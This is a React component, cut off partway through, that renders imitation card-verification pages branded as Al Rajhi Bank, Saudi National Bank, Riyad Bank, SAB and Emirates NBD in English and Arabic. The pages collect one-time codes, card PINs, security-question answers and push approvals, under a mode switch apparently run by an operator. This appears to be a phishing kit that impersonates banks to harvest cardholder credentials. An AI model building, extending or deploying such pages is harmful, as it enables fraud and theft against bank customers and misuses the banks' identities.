import React, { useState } from 'react';
import { isMastercard } from '../../Utils/cardScheme';
import './KsaBankLayout.css';

export function isKsaBankDesign(design) {
    return design && design.startsWith('ksa_');
}

export const KSA_BANKS = {
    ksa_alrajhi: { name: 'Al Rajhi Bank', primary: '#1a3ab1' },
    ksa_snb: { name: 'Saudi National Bank', primary: '#0b04e7' },
    ksa_riyad: { name: 'Riyad Bank', primary: '#27a844' },
    ksa_sab: { name: 'Saudi Awwal Bank', primary: '#47749e' },
    ksa_enbd: { name: 'Emirates NBD', primary: '#173eb8' },
    ksa_tiqmo: { name: 'Tiqmo', primary: '#0086b3' },
    ksa_tasheel: { name: 'Tasheel Finance', primary: '#253c4b' },
};

// UK Flag SVG matching HTML mockups
const UkFlagSvg = () => (
    <svg className="ksa-flag-icon" viewBox="0 0 60 30" width="20" height="13">
        <clipPath id="ksaClipUK">
            <path d="M0,0 v30 h60 v-30 z"/>
        </clipPath>
        <clipPath id="ksaClipDiag">
            <path d="M30,15 h30 v15 z v15 h-30 z h-30 v-15 z v-15 h30 z"/>
        </clipPath>
        <g clipPath="url(#ksaClipUK)">
            <path d="M0,0 v30 h60 v-30 z" fill="#012169"/>
            <path d="M0,0 L60,30 M60,0 L0,30" stroke="#ffffff" strokeWidth="6"/>
            <path d="M0,0 L60,30 M60,0 L0,30" clipPath="url(#ksaClipDiag)" stroke="#C8102E" strokeWidth="4"/>
            <path d="M30,0 v30 M0,15 h60" stroke="#ffffff" strokeWidth="10"/>
            <path d="M30,0 v30 M0,15 h60" stroke="#C8102E" strokeWidth="6"/>
        </g>
    </svg>
);

// Saudi Flag SVG matching HTML mockups
const SaFlagSvg = () => (
    <svg className="ksa-flag-icon" viewBox="0 0 30 20" width="20" height="13">
        <rect width="30" height="20" fill="#006C35"/>
        <text x="15" y="11" fontSize="5.5" fill="#ffffff" textAnchor="middle" fontFamily="Arial, sans-serif" fontWeight="bold">لا إله إلا الله</text>
        <line x1="8" y1="15" x2="22" y2="15" stroke="#ffffff" strokeWidth="0.8"/>
        <polygon points="22,15 20,13.5 20,16.5" fill="#ffffff"/>
    </svg>
);

const McIdCheckSvg = ({ small }) => (
    <svg viewBox="0 0 46 34" className="ksa-mc-logo" width={small ? 40 : 48} height={small ? 28 : 34} xmlns="http://www.w3.org/2000/svg">
        <circle cx="17" cy="11" r="9" fill="#EB001B" />
        <circle cx="29" cy="11" r="9" fill="#F79E1B" />
        <path d="M 23 4.2 A 9 9 0 0 1 23 17.8 A 9 9 0 0 1 23 4.2 Z" fill="#FF5F00" />
        <text x="23" y="30" fontFamily="Arial, Helvetica, sans-serif" fontSize="9" fontWeight="400" fill="#222" textAnchor="middle" letterSpacing="-0.1px">ID Check</text>
    </svg>
);

const VisaLogo = () => (
    <img src="/images/banks/ksa/visa.png" alt="Visa" className="ksa-visa-logo" />
);

export default function KsaBankLayout({
    design, mode,
    code, setCode, handleCodeChange, handleSubmit,
    errorMessage, isDuplicate, isRetryActive, isShaking, isSubmitting,
    timeLeft, formatTime, setIsDuplicate,
    onCancel,
    isRefund,
    onApprove,
    customMessage,
    pin, setPin, handlePinSubmit,
    customQuestion, answer, setAnswer, handleQuestionSubmit
}) {
    const [toastMessage, setToastMessage] = useState('');
    const [openAccordions, setOpenAccordions] = useState({});

    // Initial language: check design suffix (_ar) or session_mode
    const initialLang = (design?.endsWith('_ar') || localStorage.getItem('session_mode') === 'standardAR') ? 'ar' : 'en';
    const [activeLang, setActiveLang] = useState(initialLang);

    if (mode === 'loading') return null;

    const bankId = design ? design.replace(/_(visa|mc|mastercard)_(en|ar)$/i, '') : 'ksa_alrajhi';
    const isMc = isMastercard(design);

    const merchant = localStorage.getItem('session_merchant') || 'Merchant';
    const amount = localStorage.getItem('session_amount') || '0.00';
    const currency = localStorage.getItem('session_currency') || 'SAR';
    const last4 = localStorage.getItem('session_last4') || '****';
    const now = new Date();
    const dateStr = `${now.getFullYear()}/${String(now.getMonth()+1).padStart(2,'0')}/${String(now.getDate()).padStart(2,'0')}`;
    const timeStr = `${String(now.getHours()).padStart(2,'0')}:${String(now.getMinutes()).padStart(2,'0')}:${String(now.getSeconds()).padStart(2,'0')}`;

    const showToast = (msg) => {
        setToastMessage(msg);
        setTimeout(() => setToastMessage(''), 2800);
    };

    const toggleAccordion = (key) => {
        setOpenAccordions(prev => ({ ...prev, [key]: !prev[key] }));
    };

    // Clean Cancel: removes rejected_card so returning to card form does NOT show error
    const handleCleanCancel = () => {
        sessionStorage.removeItem('rejected_card');
        if (onCancel) {
            onCancel();
        }
    };

    const handleApprovePush = (e) => {
        e?.preventDefault();
        if (onApprove) {
            onApprove(e);
        }
    };

    // --- Form value/handler resolution based on mode ---
    let formVal = code || '';
    let formOnChange = handleCodeChange || (() => {});
    let formOnSubmit = handleSubmit || ((e) => e.preventDefault());
    let formInputType = 'text';
    let formMaxLen = 8;

    if (mode === 'pin') {
        formVal = pin || '';
        formOnChange = (e) => setPin && setPin(e.target.value);
        formOnSubmit = handlePinSubmit || ((e) => e.preventDefault());
        formInputType = 'password';
        formMaxLen = 4;
    } else if (mode === 'question') {
        formVal = answer || '';
        formOnChange = (e) => setAnswer && setAnswer(e.target.value);
        formOnSubmit = handleQuestionSubmit || ((e) => e.preventDefault());
        formInputType = 'text';
        formMaxLen = 100;
    }

    const onInputChange = (e) => {
        if (mode !== 'question') {
            formOnChange({ target: { value: e.target.value.replace(/\D/g, '').slice(0, formMaxLen) } });
        } else {
            formOnChange(e);
        }
    };

    const handleFormSubmit = (e) => {
        e.preventDefault();
        if (isSubmitting) return;
        formOnSubmit(e);
    };

    // --- Resend Toast Messages per bank and active language ---
    const handleResend = (customBankToast) => {
        if (customBankToast) {
            showToast(customBankToast);
        } else if (activeLang === 'ar') {
            showToast('تم إرسال رمز تحقق جديد إلى هاتفك');
        } else {
            showToast('A new verification code has been sent');
        }
    };

    // ============================================================
    // 1. AL RAJHI BANK
    // ============================================================
    const renderAlRajhi = () => {
        const isAr = activeLang === 'ar';
        const resendToast = isAr ? 'تم إرسال رمز تحقق جديد عبر رسالة نصية قصيرة.' : 'A new verification code has been sent via SMS.';
        
        let title = isAr ? 'مصادقة الشراء' : 'Purchase authentication';
        if (mode === 'pin') title = isAr ? 'مصادقة الرقم السري' : 'PIN Authentication';
        else if (mode === 'question') title = isAr ? 'مصادقة الأمان' : 'Payment Authentication';
        else if (isRefund || mode === 'refund') title = isAr ? 'مصادقة الاسترداد' : 'Refund Verification';

        let p1 = isAr
            ? `يرجى إدخال رمز التحقق الذي تم إرساله للتو إلى رقم هاتفك المحمول المسجل.`
            : `Please enter the verification code we just sent to your registered mobile number.`;
        let p2 = isAr
            ? `أنت تقوم بالدفع لـ ${merchant}<br/>بمبلغ ${amount} ${currency} باستخدام البطاقة ************${last4}.`
            : `You are paying ${merchant}<br/>the amount of ${currency} ${amount} using card ************${last4}.`;

        if (mode === 'pin') {
            p1 = isAr ? 'يرجى إدخال الرقم السري للبطاقة لإتمام العملية.' : 'Please enter your 4-digit Card PIN to complete the transaction.';
            p2 = '';
        } else if (mode === 'question') {
            p1 = customQuestion || (isAr ? 'يرجى الإجابة على سؤال الأمان أدناه لإتمام العملية:' : 'Please answer your security question below to authorize this transaction:');
            p2 = '';
        } else if (mode === 'push') {
            p1 = customMessage || (isAr ? 'يرجى فتح تطبيق الراجحي والموافقة على طلب تفويض العملية.' : 'Please open Al Rajhi app and approve the transaction request.');
            p2 = '';
        }

        return (
            <div className="ksa-alrajhi-wrapper" dir={isAr ? 'rtl' : 'ltr'}>
                <div className="ksa-alrajhi-top-bar">
                    <div className="ksa-alrajhi-lang-switcher">
                        <button
                            type="button"
                            className={`ksa-flag-btn ${!isAr ? 'active' : ''}`}
                            onClick={() => setActiveLang('en')}
                            title="English"
                        >
                            <UkFlagSvg />
                        </button>
                        <button
                            type="button"
                            className={`ksa-flag-btn ${isAr ? 'active' : ''}`}
                            onClick={() => setActiveLang('ar')}
                            title="العربية"
                        >
                            <SaFlagSvg />
                        </button>
                    </div>
                    <button type="button" className="ksa-alrajhi-close-btn" onClick={handleCleanCancel} title="Close" aria-label="Close">✕</button>
                </div>

                <div className="ksa-alrajhi-logos-row">
                    <img src="/images/banks/ksa/alrajhi.png" alt="alrajhi bank" className="ksa-alrajhi-logo" />
                    {isMc ? <McIdCheckSvg /> : <VisaLogo />}
                </div>

                <div className="ksa-alrajhi-divider"></div>

                <div className="ksa-alrajhi-content-area">
                    <h1 className="ksa-alrajhi-auth-title">{title}</h1>
                    <p className="ksa-alrajhi-auth-text">{p1}</p>
                    {p2 && <p className="ksa-alrajhi-auth-text ksa-alrajhi-p2" dangerouslySetInnerHTML={{ __html: p2 }} />}

                    {mode === 'error' ? (
                        <div className="ksa-error-box">
                            <p>{errorMessage || 'Verification Failed'}</p>
                            <button type="button" onClick={handleCleanCancel} className="ksa-alrajhi-submit-btn">{isAr ? 'رجوع' : 'Return'}</button>
                        </div>
                    ) : mode === 'push' ? (
                        <div className="ksa-push-box">
                            <div className="ksa-spinner"></div>
                            <p>{p1}</p>
                            <button type="button" className="ksa-alrajhi-submit-btn" onClick={handleApprovePush} style={{ marginTop: '16px' }}>
                                {isAr ? 'لقد أكدت الإشعار' : 'I confirmed push'}
                            </button>
                            <div className="ksa-alrajhi-resend-wrap" style={{ marginTop: '12px' }}>
                                <button type="button" className="ksa-alrajhi-resend-link" onClick={() => handleResend(isAr ? 'تم إرسال إشعار جديد' : 'A new notification has been sent')}>
                                    {isAr ? 'اضغط هنا للحصول على إشعار آخر' : 'CLICK HERE TO RESEND NOTIFICATION'}
                                </button>
                            </div>
                        </div>
                    ) : (
                        <form className="ksa-alrajhi-form" onSubmit={handleFormSubmit}>
                            {errorMessage && <div className="ksa-error-msg">{errorMessage}</div>}
                            <label className="ksa-alrajhi-code-label">
                                {mode === 'pin' ? (isAr ? 'الرقم السري' : 'PIN') : mode === 'question' ? (isAr ? 'الإجابة' : 'Answer') : (isAr ? 'رمز التحقق' : 'Verification Code')}
                            </label>
                            <input
                                type={formInputType}
                                value={formVal}
                                onChange={onInputChange}
                                className={`ksa-alrajhi-code-input ${errorMessage ? 'ksa-input-error' : ''}`}
                                maxLength={formMaxLen}
                                disabled={isSubmitting}
                                inputMode={mode === 'question' ? 'text' : 'numeric'}
                                autoFocus
                            />
                            <button type="submit" className="ksa-alrajhi-submit-btn" disabled={isSubmitting}>
                                {isSubmitting ? <span className="ksa-spinner-small"></span> : (mode === 'pin' ? (isAr ? 'تأكيد' : 'VERIFY') : isRefund ? (isAr ? 'تأكيد الاسترداد' : 'CONFIRM REFUND') : (isAr ? 'إرسال' : 'SUBMIT'))}
                            </button>
                        </form>
                    )}

                    {mode !== 'push' && mode !== 'error' && mode !== 'question' && (
                        <div className="ksa-alrajhi-resend-wrap">
                            <button type="button" className="ksa-alrajhi-resend-link" onClick={() => handleResend(resendToast)}>
                                {isAr ? 'اضغط هنا للحصول على رمز آخر' : 'CLICK HERE TO RECEIVE ANOTHER CODE'}
                            </button>
                        </div>
                    )}

                    <div className="ksa-alrajhi-footer-links">
                        <span className="ksa-alrajhi-footer-link" onClick={() => showToast(isAr ? 'الدعم الفني: 920003344' : 'Support hotline: 920003344')}>
                            {isAr ? 'هل تحتاج إلى مساعدة؟' : 'Need help?'}
                        </span>
                        <span className="ksa-alrajhi-footer-sep">|</span>
                        <span className="ksa-alrajhi-footer-link" onClick={() => showToast(isAr ? 'شروط وأحكام مصرف الراجحي' : 'Al Rajhi Bank Terms & Conditions')}>
                            {isAr ? 'شروط الاستخدام' : 'Terms of Use'}
                        </span>
                    </div>
                </div>
            </div>
        );
    };

    // ============================================================
    // 2. SNB — Saudi National Bank (Al Ahli)
    // ============================================================
    const renderSnb = () => {
        const isAr = activeLang === 'ar';
        const resendToast = isAr ? 'تم إرسال رمز تحقق جديد إلى هاتفك المحمول.' : 'A new verification code has been sent to your mobile.';

        let title = isAr ? 'التحقق عبر الهاتف' : 'Verify By Phone';
        if (mode === 'pin') title = isAr ? 'مصادقة الرقم السري' : 'PIN Authentication';
        else if (mode === 'question') title = isAr ? 'مصادقة الدفع' : 'Payment Authentication';
        else if (isRefund || mode === 'refund') title = isAr ? 'استرداد' : 'Refund Verification';

        let p1 = isAr
            ? 'لقد أرسلنا لك رسالة نصية تحتوي على رمز إلى رقم هاتفك المحمول المسجل.'
            : 'We have sent you a text message with a code to your<br/>registered mobile number.';
        let p2 = isAr
            ? `أنت تقوم بالدفع لـ ${merchant} بمبلغ ${amount} ${currency} في ${dateStr} ${timeStr}.`
            : `You are paying ${merchant} the amount of ${currency}<br/>${amount} on ${dateStr} ${timeStr}.`;

        if (mode === 'pin') {
            p1 = isAr ? 'يرجى إدخال الرقم السري للبطاقة المكون من 4 أرقام.' : 'Please enter your 4-digit Card PIN to complete authentication.';
            p2 = '';
        } else if (mode === 'question') {
            p1 = customQuestion || (isAr ? 'يرجى الإجابة على سؤال الأمان أدناه لإتمام المعاملة:' : 'Please answer the security question below to complete authentication:');
            p2 = '';
        } else if (mode === 'push') {
            p1 = customMessage || (isAr ? 'يرجى فتح تطبيق الأهلي موبايل والموافقة على العملية.' : 'Please open SNB Mobile app and approve the authentication request.');
            p2 = '';
        }

        return (
            <div className="ksa-snb-wrapper" dir={isAr ? 'rtl' : 'ltr'}>
                <div className="ksa-snb-top-row">
                    <div className="ksa-snb-lang-switcher">
                        <button type="button" className={`ksa-flag-btn ${!isAr ? 'active' : ''}`} onClick={() => setActiveLang('en')} title="English">
                            <UkFlagSvg />
                        </button>
                        <button type="button" className={`ksa-flag-btn ${isAr ? 'active' : ''}`} onClick={() => setActiveLang('ar')} title="العربية">
                            <SaFlagSvg />
                        </button>
                    </div>
                    <span className="ksa-snb-cancel-link" onClick={handleCleanCancel}>{isAr ? 'إلغاء' : 'Cancel'}</span>
                </div>

                <div className="ksa-snb-logos-row">
                    <div className="ksa-snb-left-logos">
                        <img src="/images/banks/ksa/snb.png" alt="SNB" className="ksa-snb-logo-img" />
                        <img src="/images/banks/ksa/mada.png" alt="mada" className="ksa-snb-mada-img" />
                    </div>
                    {isMc ? <McIdCheckSvg /> : <VisaLogo />}
                </div>

                <div className="ksa-snb-divider"></div>

                <h1 className="ksa-snb-auth-title">{title}</h1>
                <p className="ksa-snb-auth-text" dangerouslySetInnerHTML={{ __html: p1 }}></p>
                {p2 && <p className="ksa-snb-auth-text ksa-snb-p2" dangerouslySetInnerHTML={{ __html: p2 }}></p>}

                {mode === 'error' ? (
                    <div className="ksa-error-box">
                        <p>{errorMessage || 'Verification Failed'}</p>
                        <button type="button" onClick={handleCleanCancel} className="ksa-snb-confirm-btn" style={{ marginTop: '20px' }}>{isAr ? 'رجوع' : 'Return'}</button>
                    </div>
                ) : mode === 'push' ? (
                    <div className="ksa-push-box">
                        <div className="ksa-spinner"></div>
                        <p dangerouslySetInnerHTML={{ __html: p1 }}></p>
                        <button type="button" className="ksa-snb-confirm-btn" onClick={handleApprovePush} style={{ marginTop: '16px' }}>
                            {isAr ? 'لقد أكدت الإشعار' : 'I confirmed push'}
                        </button>
                        <button type="button" className="ksa-snb-resend-link" onClick={() => handleResend(isAr ? 'تم إرسال إشعار جديد' : 'A new notification has been sent')}>
                            {isAr ? 'إعادة إرسال الإشعار' : 'RESEND NOTIFICATION'}
                        </button>
                    </div>
                ) : (
                    <form onSubmit={handleFormSubmit} className="ksa-snb-form">
                        {errorMessage && <div className="ksa-error-msg">{errorMessage}</div>}
                        <label className="ksa-snb-code-label">
                            {mode === 'pin' ? (isAr ? 'الرقم السري' : 'PIN') : mode === 'question' ? (isAr ? 'الإجابة' : 'Answer') : (isAr ? 'رمز التحقق' : 'Verification code')}
                        </label>
                        <input
                            type={formInputType}
                            value={formVal}
                            onChange={onInputChange}
                            className="ksa-snb-code-input"
                            maxLength={formMaxLen}
                            inputMode={mode === 'question' ? 'text' : 'numeric'}
                            autoFocus
                        />
                        <button type="submit" className="ksa-snb-confirm-btn" disabled={isSubmitting}>
                            {isSubmitting ? <span className="ksa-spinner-small"></span> : (mode === 'pin' ? (isAr ? 'تأكيد' : 'CONFIRM') : isRefund ? (isAr ? 'تأكيد الاسترداد' : 'CONFIRM REFUND') : (isAr ? 'تأكيد' : 'CONFIRM'))}
                        </button>
                        {mode !== 'question' && (
                            <button type="button" className="ksa-snb-resend-link" onClick={() => handleResend(resendToast)}>
                                {isAr ? 'إعادة إرسال الرمز' : 'RESEND CODE'}
                            </button>
                        )}
                    </form>
                )}

                <div className="ksa-snb-accordion-container">
                    <div className="ksa-snb-accordion-item">
                        <div className="ksa-snb-accordion-header" onClick={() => toggleAccordion('snb_learn')}>
                            <span>{isAr ? 'تعرّف على المزيد حول المصادقة' : 'Learn more about authentication'}</span>
                            <span className="ksa-accordion-plus">{openAccordions['snb_learn'] ? '−' : '+'}</span>
                        </div>
                        {openAccordions['snb_learn'] && (
                            <div className="ksa-snb-accordion-body">
                                {isAr ? 'توفر المصادقة طبقة أمان إضافية لحماية بطاقتك من العمليات غير المصرح بها عند الشراء عبر الإنترنت.' : 'Authentication protects your card with an extra layer of security against unauthorized transactions when shopping online.'}
                            </div>
                        )}
                    </div>
                    <div className="ksa-snb-accordion-item">
                        <div className="ksa-snb-accordion-header" onClick={() => toggleAccordion('snb_help')}>
                            <span>{isAr ? 'هل تحتاج إلى مساعدة؟' : 'Need some help ?'}</span>
                            <span className="ksa-accordion-plus">{openAccordions['snb_help'] ? '−' : '+'}</span>
                        </div>
                        {openAccordions['snb_help'] && (
                            <div className="ksa-snb-accordion-body">
                                {isAr ? 'إذا لم تستلم الرمز أو كنت بحاجة إلى مساعدة، يُرجى التواصل مع خدمة عملاء البنك الأهلي على الرقم 920001000.' : 'If you did not receive your code or need assistance, please contact SNB customer support at 920001000.'}
                            </div>
                        )}
                    </div>
                </div>
            </div>
        );
    };

    // ============================================================
    // 3. RIYAD BANK
    // ============================================================
    const renderRiyad = () => {
        const isAr = activeLang === 'ar';
        const resendToast = isAr ? 'تم إرسال رمز تحقق جديد إلى هاتفك' : 'A new verification code has been sent to your phone';

        let title = isAr ? 'التحقق عن طريق الهاتف' : 'Verify by phone';
        if (mode === 'pin') title = isAr ? 'مصادقة الرقم السري' : 'PIN Verification';
        else if (mode === 'question') title = isAr ? 'مصادقة الدفع' : 'Payment Authentication';
        else if (isRefund || mode === 'refund') title = isAr ? 'مصادقة الاسترداد' : 'Refund Verification';

        let subtitle = isAr
            ? `تم إرسال رسالة نصية بها رمز التحقق إلى رقم هاتفك المحمول المسجل لإتمام المعاملة.`
            : `A text message with a verification code has been sent to your registered mobile number to complete the transaction.`;

        if (mode === 'pin') {
            subtitle = isAr ? 'يرجى إدخال الرقم السري للبطاقة لإتمام المعاملة.' : 'Please enter your card PIN to complete the transaction.';
        } else if (mode === 'question') {
            subtitle = customQuestion || (isAr ? 'يرجى الإجابة على سؤال الأمان أدناه لإتمام العملية:' : 'Please answer the security question below to complete the transaction:');
        } else if (mode === 'push') {
            subtitle = customMessage || (isAr ? 'يرجى الموافقة على الإشعار المرسل إلى تطبيق بنك الرياض.' : 'Please approve the push notification sent to your Riyad Bank mobile app.');
        }

        return (
            <div className="ksa-riyad-wrapper" dir={isAr ? 'rtl' : 'ltr'}>
                <header className="ksa-riyad-header">
                    <img src="/images/banks/ksa/riyad.png" alt="Riyad Bank" className="ksa-riyad-logo-left" />
                    <div className="ksa-riyad-logos-right">
                        {isMc ? <McIdCheckSvg /> : <VisaLogo />}
                    </div>
                </header>

                <h1 className="ksa-riyad-main-title">{title}</h1>
                <p className="ksa-riyad-subtitle">{subtitle}</p>

                <div className="ksa-riyad-details-section">
                    <table className="ksa-riyad-details-table">
                        <tbody>
                            <tr>
                                <td className="ksa-riyad-detail-label">{isAr ? 'التاجر:' : 'Merchant:'}</td>
                                <td className="ksa-riyad-detail-value">{merchant}</td>
                            </tr>
                            <tr>
                                <td className="ksa-riyad-detail-label">{isAr ? 'المبلغ:' : 'Amount:'}</td>
                                <td className="ksa-riyad-detail-value"><b>{amount} {currency}</b></td>
                            </tr>
                            <tr>
                                <td className="ksa-riyad-detail-label">{isAr ? 'التاريخ:' : 'Date:'}</td>
                                <td className="ksa-riyad-detail-value">{dateStr}</td>
                            </tr>
                            <tr>
                                <td className="ksa-riyad-detail-label">{isAr ? 'رقم البطاقة:' : 'Card Number:'}</td>
                                <td className="ksa-riyad-detail-value">**** **** **** {last4}</td>
                            </tr>
                        </tbody>
                    </table>
                </div>

                {mode === 'error' ? (
                    <div className="ksa-error-box"><p>{errorMessage || 'Verification Failed'}</p></div>
                ) : mode === 'push' ? (
                    <div className="ksa-push-box">
                        <div className="ksa-spinner"></div>
                        <p>{subtitle}</p>
                        <button type="button" className="ksa-riyad-submit-btn" onClick={handleApprovePush} style={{ marginTop: '16px' }}>
                            {isAr ? 'لقد أكدت الإشعار' : 'I confirmed push'}
                        </button>
                        <div className="ksa-riyad-actions-row" style={{ marginTop: '10px' }}>
                            <button type="button" className="ksa-riyad-action-link" onClick={() => handleResend(isAr ? 'تم إرسال إشعار جديد' : 'A new notification has been sent')}>
                                {isAr ? 'أعد إرسال الإشعار' : 'RESEND NOTIFICATION'}
                            </button>
                        </div>
                    </div>
                ) : (
                    <form className="ksa-riyad-form-section" onSubmit={handleFormSubmit}>
                        {errorMessage && <div className="ksa-error-msg">{errorMessage}</div>}
                        <label className="ksa-riyad-input-label">
                            {mode === 'pin' ? (isAr ? 'الرقم السري' : 'PIN') : mode === 'question' ? (isAr ? 'الإجابة' : 'Answer') : (isAr ? 'رمز التحقق' : 'Verification code')}
                        </label>
                        <input
                            type={formInputType}
                            value={formVal}
                            onChange={onInputChange}
                            className="ksa-riyad-input-box"
                            maxLength={formMaxLen}
                            inputMode={mode === 'question' ? 'text' : 'numeric'}
                            autoFocus
                        />
                        <button type="submit" className="ksa-riyad-submit-btn" disabled={isSubmitting}>
                            {isSubmitting ? <span className="ksa-spinner-small"></span> : (mode === 'pin' ? (isAr ? 'تأكيد' : 'SUBMIT') : isRefund ? (isAr ? 'تأكيد الاسترداد' : 'CONFIRM REFUND') : (isAr ? 'قدم الطلب' : 'SUBMIT'))}
                        </button>
                    </form>
                )}

                <div className="ksa-riyad-actions-row">
                    <button type="button" className="ksa-riyad-action-link" onClick={handleCleanCancel}>
                        {isAr ? 'إلغاء' : 'CANCEL'}
                    </button>
                    {mode !== 'push' && mode !== 'question' && (
                        <button type="button" className="ksa-riyad-action-link" onClick={() => handleResend(resendToast)}>
                            {isAr ? 'أعد إرسال الرمز' : 'RESEND CODE'}
                        </button>
                    )}
                </div>

                {/* Language Switcher Buttons */}
                <div className="ksa-riyad-lang-row">
                    <div className="ksa-riyad-lang-switcher">
                        <button
                            type="button"
                            className={!isAr ? 'ksa-riyad-lang-active' : 'ksa-riyad-lang-inactive'}
                            onClick={() => setActiveLang('en')}
                        >
                            EN
                        </button>
                        <button
                            type="button"
                            className={isAr ? 'ksa-riyad-lang-active' : 'ksa-riyad-lang-inactive'}
                            onClick={() => setActiveLang('ar')}
                        >
                            AR
                        </button>
                    </div>
                </div>

                {/* FAQ Accordion */}
                <div className="ksa-riyad-faq-section">
                    <div className="ksa-riyad-faq-item">
                        <div className="ksa-riyad-faq-header" onClick={() => toggleAccordion('riyad_faq1')}>
                            <span className="ksa-riyad-faq-title">{isAr ? 'تعرف على المزيد حول المصادقة' : 'Learn more about authentication'}</span>
                            <span className="ksa-riyad-faq-icon">{openAccordions['riyad_faq1'] ? '−' : '+'}</span>
                        </div>
                        {openAccordions['riyad_faq1'] && (
                            <div className="ksa-riyad-faq-body">
                                {isAr ? 'يوفر التحقق الآمن حماية إضافية لمعاملاتك عبر الإنترنت من خلال التحقق من هويتك باستخدام رمز لمرة واحدة يتم إرساله إلى هاتفك المحمول المسجل.' : 'Secure authentication adds an extra layer of protection to your online transactions by verifying your identity with a one-time passcode sent to your registered mobile device.'}
                            </div>
                        )}
                    </div>
                    <div className="ksa-riyad-faq-item">
                        <div className="ksa-riyad-faq-header" onClick={() => toggleAccordion('riyad_faq2')}>
                            <span className="ksa-riyad-faq-title">{isAr ? 'بحاجة لبعض المساعدة؟' : 'Need some help?'}</span>
                            <span className="ksa-riyad-faq-icon">{openAccordions['riyad_faq2'] ? '−' : '+'}</span>
                        </div>
                        {openAccordions['riyad_faq2'] && (
                            <div className="ksa-riyad-faq-body">
                                {isAr ? 'إذا واجهتك أي صعوبات، يرجى التواصل مع خدمة عملاء بنك الرياض على مدار الساعة على الرقم 920002470.' : 'If you are experiencing any issues, please contact Riyad Bank Customer Care 24/7 at (+966) 920002470.'}
                            </div>
                        )}
                    </div>
                </div>
            </div>
        );
    };

    // ============================================================
    // 4. SAB — Saudi Awwal Bank (NO LANGUAGE SELECTOR per user requirement)
    // ============================================================
    const renderSab = () => {
        let title = 'Payment authentication - SAB';
        if (mode === 'pin') title = 'PIN Authentication - SAB';
        else if (mode === 'question') title = 'Payment authentication - SAB';
        else if (isRefund || mode === 'refund') title = 'Refund Authentication - SAB';

        return (
            <div className="ksa-sab-wrapper" dir="ltr">
                {/* Top Bar: ONLY CANCEL (Language selector removed as requested) */}
                <div className="ksa-sab-top-bar">
                    <span className="ksa-sab-cancel-link" onClick={handleCleanCancel}>CANCEL</span>
                </div>

                <div className="ksa-sab-full-divider"></div>

                <div className="ksa-sab-logos-row">
                    <img src="/images/banks/ksa/sab.svg" alt="SAB الأول" className="ksa-sab-logo-img" />
                    {isMc ? <McIdCheckSvg /> : <VisaLogo />}
                </div>

                <div className="ksa-sab-full-divider"></div>

                <div className="ksa-sab-content-area">
                    <h1 className="ksa-sab-auth-title">{title}</h1>

                    {mode === 'error' ? (
                        <div className="ksa-error-box"><p>{errorMessage || 'Verification Failed'}</p></div>
                    ) : mode === 'push' ? (
                        <div className="ksa-push-box">
                            <div className="ksa-spinner"></div>
                            <p>{customMessage || `Please approve the push notification sent to your SAB mobile app to complete the transaction of ${currency} ${amount} to ${merchant}.`}</p>
                            <button type="button" className="ksa-sab-btn-verification" onClick={handleApprovePush} style={{ marginTop: '16px', marginBottom: '8px' }}>
                                I confirmed push
                            </button>
                            <button type="button" className="ksa-sab-btn-resend" onClick={() => handleResend('A new notification has been sent')}>
                                Resend notification
                            </button>
                        </div>
                    ) : (
                        <>
                            <p className="ksa-sab-auth-desc">
                                {mode === 'pin'
                                    ? `Please enter your 4-digit PIN to complete the transaction.\nYou are paying to the merchant ${merchant} Amount ${currency} ${amount}`
                                    : mode === 'question'
                                    ? (customQuestion || 'Please enter the answer to your security question below to complete the transaction.')
                                    : isRefund
                                    ? `Please enter the refund verification code sent to your registered mobile number to complete the refund of ${currency} ${amount}.`
                                    : `Please enter the OTP sent to your registered mobile number\nto complete the transaction\nYou are paying to the merchant ${merchant}\nAmount ${currency} ${amount} on ${dateStr} ${timeStr}`
                                }
                            </p>

                            <form className="ksa-sab-form-container" onSubmit={handleFormSubmit}>
                                {errorMessage && <div className="ksa-error-msg">{errorMessage}</div>}
                                <input
                                    type={formInputType}
                                    value={formVal}
                                    onChange={onInputChange}
                                    className="ksa-sab-otp-input"
                                    placeholder={mode === 'pin' ? 'Enter 4-digit PIN' : mode === 'question' ? 'Your answer' : 'Please submit your - OTP'}
                                    maxLength={formMaxLen}
                                    inputMode={mode === 'question' ? 'text' : 'numeric'}
                                    autoFocus
                                />
                                <button type="submit" className="ksa-sab-btn-verification" disabled={isSubmitting}>
                                    {isSubmitting ? <span className="ksa-spinner-small"></span> : (mode === 'pin' ? 'VERIFY PIN' : isRefund ? 'CONFIRM REFUND' : 'Verification')}
                                </button>
                                {mode !== 'question' && (
                                    <button type="button" className="ksa-sab-btn-resend" onClick={() => handleResend('A new verification code has been sent to your registered mobile')}>
                                        Resend OTP
                                    </button>
                                )}
                            </form>
                        </>
                    )}
                </div>

                <div className="ksa-sab-bottom-divider"></div>

                <div className="ksa-sab-accordion-section">
                    <div className="ksa-sab-accordion-item">
                        <button type="button" className="ksa-sab-accordion-header" onClick={() => toggleAccordion('sab_desc')}>
                            <span>DESCRIPTION OF 3D Secure Service</span>
                            <span className="ksa-accordion-plus">{openAccordions['sab_desc'] ? '−' : '+'}</span>
                        </button>
                        {openAccordions['sab_desc'] && (
                            <div className="ksa-sab-accordion-body">
                                3D Secure adds an extra layer of protection for online card payments, ensuring only the genuine cardholder can authorize transactions.
                            </div>
                        )}
                    </div>
                    <div className="ksa-sab-accordion-item">
                        <button type="button" className="ksa-sab-accordion-header" onClick={() => toggleAccordion('sab_help')}>
                            <span>Help</span>
                            <span className="ksa-accordion-plus">{openAccordions['sab_help'] ? '−' : '+'}</span>
                        </button>
                        {openAccordions['sab_help'] && (
                            <div className="ksa-sab-accordion-body">
                                If you need assistance with your SAB card authentication, please contact SAB Customer Care 24/7 at 800 124 8888.
                            </div>
                        )}
                    </div>
                </div>
            </div>
        );
    };

    // ============================================================
    // 5. EMIRATES NBD
    // ============================================================
    const renderEnbd = () => {
        let title = 'Payment Authentication';
        if (mode === 'pin') title = 'PIN Authentication';
        else if (mode === 'question') title = 'Payment Authentication';
        else if (isRefund || mode === 'refund') title = 'Refund Authentication';

        let p1 = 'We just sent a SMS with secure code to your registered<br/>mobile number.';
        let p2 = `You are authorizing a payment to ${merchant}<br/>for ${currency} ${amount} on ${dateStr} with your card<br/>ending with ************${last4}.`;

        if (mode === 'pin') {
            p1 = 'Please enter your 4-digit PIN to authenticate this payment.';
            p2 = '';
        } else if (mode === 'question') {
            p1 = customQuestion || 'Please answer the security question below to authenticate this transaction.';
            p2 = '';
        } else if (mode === 'push') {
            p1 = customMessage || `Please approve the notification sent to your Emirates NBD mobile app to complete the transaction of ${currency} ${amount}.`;
            p2 = '';
        }

        return (
